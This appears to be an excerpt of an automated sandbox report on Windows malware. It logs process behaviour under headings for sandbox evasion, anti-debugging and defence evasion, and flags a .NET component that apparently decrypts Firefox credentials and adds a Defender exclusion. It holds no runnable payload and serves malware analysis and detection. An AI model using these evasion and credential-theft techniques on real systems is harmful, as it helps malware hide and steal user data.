Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Allocates many large memory junks

Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Memory allocated: 2830000 memory commit 500006912
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Memory allocated: 2831000 memory commit 500178944
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Memory allocated: 285C000 memory commit 500002816
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Memory allocated: 285D000 memory commit 500199424
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Memory allocated: 288E000 memory commit 501014528
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Memory allocated: 2986000 memory commit 500006912
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Memory allocated: 2988000 memory commit 500015104
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 27C0000 memory commit 500006912	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 27C1000 memory commit 500178944	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 27EC000 memory commit 500002816	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 27ED000 memory commit 500199424	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 281E000 memory commit 501014528	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2916000 memory commit 500006912	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2918000 memory commit 500015104	Jump to behavior
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Memory allocated: 2800000 memory commit 500006912
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Memory allocated: 2801000 memory commit 500178944
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Memory allocated: 282C000 memory commit 500002816
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Memory allocated: 282D000 memory commit 500199424
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Memory allocated: 285E000 memory commit 501014528
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Memory allocated: 2956000 memory commit 500006912
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Memory allocated: 2958000 memory commit 500015104

Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Memory allocated: 25680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Memory allocated: 25A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Memory allocated: 25980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: 21C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: 2390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: 4390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: 5AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: 2DAD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Memory allocated: 13B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Memory allocated: 2E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Memory allocated: 4E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Memory allocated: 1D640000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Memory allocated: 1DB90000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Memory allocated: 1D9D0000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Memory allocated: 2DB60000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Memory allocated: 2E060000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Memory allocated: 30060000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Memory allocated: 1650000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Memory allocated: 3490000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Memory allocated: 32F0000 memory reserve \| memory write watch

Source: C:\Users\Public\Libraries\rpkhzpuO.pif

7_2_004019F0

Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6123	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1718	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Window / User API: threadDelayed 1066

Source: C:\Users\Public\Libraries\rpkhzpuO.pif

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_7-14269

Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 5460	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 1532	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5596	Thread sleep count: 6123 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6156	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6512	Thread sleep count: 1718 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6768	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 6580	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 6168	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 7136	Thread sleep time: -63960000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 7136	Thread sleep time: -60000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_027C58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

4_2_027C58B4

Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Thread delayed: delay time: 60000

Source: rpkhzpuO.pif, 00000007.00000002.2127772840.0000000023BF2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: x.exe, 00000004.00000002.2065211434.00000000005A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: x.exe, 00000004.00000002.2065211434.000000000054E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: rpkhzpuO.pif, 00000007.00000002.2127772840.0000000023BF2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yA
Source: Microsofts.exe, 00000009.00000002.3264032203.0000000001293000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
Source: x.exe, 00000004.00000002.2065211434.00000000005A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWa
Source: Oupzhkpr.PIF, 0000000E.00000002.2164184214.000000000078E000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000002.2250069764.0000000000845000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\x.exe	API call chain: ExitProcess graph end node	graph_4-25458
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	API call chain: ExitProcess graph end node	graph_14-26830
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_027DEBF0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

4_2_027DEBF0

Source: C:\Users\user\AppData\Local\Temp\x.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process queried: DebugPort
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process queried: DebugPort

Source: C:\Users\Public\Libraries\rpkhzpuO.pif

Code function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

7_2_0040CE09

Source: C:\Users\Public\Libraries\rpkhzpuO.pif

7_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_027D87A0 LoadLibraryW,GetProcAddress,FreeLibrary,

4_2_027D87A0

Source: C:\Users\Public\Libraries\rpkhzpuO.pif

Code function: 7_2_0040ADB0 GetProcessHeap,HeapFree,

7_2_0040ADB0

Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process token adjusted: Debug

Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0040CE09
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0040E61C
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00416F6A
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_2_004123F1 SetUnhandledExceptionFilter,	7_2_004123F1
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_1_0040CE09
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_1_0040E61C
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_1_00416F6A
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 7_1_004123F1 SetUnhandledExceptionFilter,	7_1_004123F1
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_0040CE09
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_0040E61C
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_00416F6A
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_2_004123F1 SetUnhandledExceptionFilter,	18_2_004123F1
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_1_0040CE09
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_1_0040E61C
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_1_00416F6A
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 18_1_004123F1 SetUnhandledExceptionFilter,	18_1_004123F1
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_2_0040CE09
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_2_0040E61C
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_00416F6A
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_2_004123F1 SetUnhandledExceptionFilter,	23_2_004123F1
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_1_0040CE09
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_1_0040E61C
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_1_00416F6A
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Code function: 23_1_004123F1 SetUnhandledExceptionFilter,	23_1_004123F1

Source: C:\Users\Public\Libraries\rpkhzpuO.pif

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: Microsofts.exe.7.dr, UltraSpeed.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: Microsofts.exe.7.dr, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: Microsofts.exe.7.dr, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

